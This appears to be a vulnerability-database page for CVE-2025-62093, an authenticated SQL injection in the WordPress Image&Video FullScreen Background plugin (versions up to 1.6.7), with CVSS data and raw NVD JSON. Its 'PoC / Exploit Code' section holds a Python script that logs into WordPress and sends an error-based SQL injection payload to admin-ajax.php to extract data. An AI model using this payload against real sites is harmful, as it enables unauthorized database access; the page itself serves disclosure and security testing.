Security Vulnerability Report
中文
CVE-2025-62093 CVSS 8.5 HIGH

CVE-2025-62093

Published: 2025-12-09 16:18:01
Last Modified: 2026-04-27 17:16:32

Description

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in LambertGroup Image&Video FullScreen Background lbg_fullscreen_fullwidth_slider allows SQL Injection.This issue affects Image&Video FullScreen Background: from n/a through <= 1.6.7.

CVSS Details

CVSS Score
8.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L

Configurations (Affected Products)

No configuration data available.

lbg_fullscreen_fullwidth_slider <= 1.6.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-62093 SQL Injection PoC # Target: WordPress lbg_fullscreen_fullwidth_slider plugin <= 1.6.7 # Type: Authenticated SQL Injection TARGET_URL = "http://target-wordpress-site.com/" USERNAME = "attacker_account" PASSWORD = "attacker_password" def get_wordpress_session(): """Login to WordPress and get session cookie""" login_url = TARGET_URL + "wp-login.php" session = requests.Session() login_data = { 'log': USERNAME, 'pwd': PASSWORD, 'wp-submit': 'Log In', 'redirect_to': TARGET_URL + 'wp-admin/', 'testcookie': '1' } response = session.post(login_url, data=login_data, allow_redirects=True) if 'wordpress_logged_in' in str(session.cookies): return session return None def exploit_sql_injection(session): """Send malicious SQL injection payload""" # Vulnerable endpoint - plugin's AJAX handler vuln_url = TARGET_URL + "wp-admin/admin-ajax.php" # SQL Injection payload - extract database version payload = { 'action': 'lbg_ajax_action', 'lbg_param': "1' AND (SELECT 7745 FROM(SELECT COUNT(*),CONCAT(0x7171787071,(SELECT MID((IFNULL(CAST(database() AS CHAR),0x20)),1,50)),0x7178786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- -", 'slider_id': '1' } response = session.post(vuln_url, data=payload) print(f"Response Status: {response.status_code}") print(f"Response Content: {response.text[:500]}") return response def main(): print("[*] CVE-2025-62093 SQL Injection PoC") print("[*] Target: lbg_fullscreen_fullwidth_slider <= 1.6.7") session = get_wordpress_session() if not session: print("[!] Failed to obtain WordPress session") sys.exit(1) print("[+] Successfully authenticated") exploit_sql_injection(session) if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62093", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:18:00.783", "lastModified": "2026-04-27T17:16:31.993", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in LambertGroup Image&Video FullScreen Background lbg_fullscreen_fullwidth_slider allows SQL Injection.This issue affects Image&Video FullScreen Background: from n/a through <= 1.6.7."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.1, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/lbg_fullscreen_fullwidth_slider/vulnerability/wordpress-image-video-fullscreen-background-plugin-1-6-7-sql-injection-vulnerability?_s_id=cve", "source": "[email protected]"}]}}